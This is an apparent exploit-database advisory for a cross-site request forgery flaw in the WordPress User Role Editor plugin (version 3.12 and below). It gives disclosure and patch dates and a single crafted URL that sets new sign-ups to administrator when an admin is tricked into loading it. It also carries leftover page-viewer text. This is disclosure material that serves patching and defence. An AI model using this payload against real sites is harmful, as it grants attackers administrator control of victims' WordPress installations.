18 lines
No EOL
621 B
Text
18 lines
No EOL
621 B
Text
# Exploit Title: WP User Role Editor CSRF
|
|
# Date: 19/5/13
|
|
# Exploit Author: Henry Hoggard
|
|
# Author Website: http://henryhoggard.co.uk
|
|
# Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor
|
|
# Software Link:https://wordpress.org/support/plugin/user-role-editor
|
|
# Version: <=3.12
|
|
# Tested on: Debian
|
|
# CVE : none yet
|
|
|
|
Notified Dev: 16/05/13
|
|
Patch Released (3.14): 17/05/13
|
|
|
|
Description:
|
|
This allows you to sign up with admin privileges if you make the admin
|
|
visit your CSRF script.
|
|
|
|
http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator |